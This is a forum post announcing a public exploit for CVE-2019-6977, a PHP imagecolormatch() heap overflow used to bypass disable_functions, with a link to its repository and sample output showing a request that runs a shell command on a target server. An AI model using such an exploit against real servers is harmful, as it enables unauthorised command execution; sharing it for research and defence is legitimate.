Jump to content
Nytro

imagecolormatch() OOB Heap Write exploit

Recommended Posts

Posted

imagecolormatch() OOB Heap Write exploit

Info

My binary exploit for CVE-2019-6977. Bug found by Simon Scannell from RIPS.

PHP bug is here. Helps you bypass PHP's disable_functions INI directive.

I commented a lot to help people that are new to binary PHP exploitation. Hope this helps.

Output

GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
Nenuphar.ce: 0x7fe834a10018
Nenuphar2.ce: 0x7fe834a10d70
Nenuphar.properties: 0x7fe834a01230
z.val: 0x7fe834aaea18
Difference: 0xad7e8

Exploit SUCCESSFUL !

 

Sursa: https://github.com/cfreal/exploits/tree/master/CVE-2019-6977-imagecolormatch

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...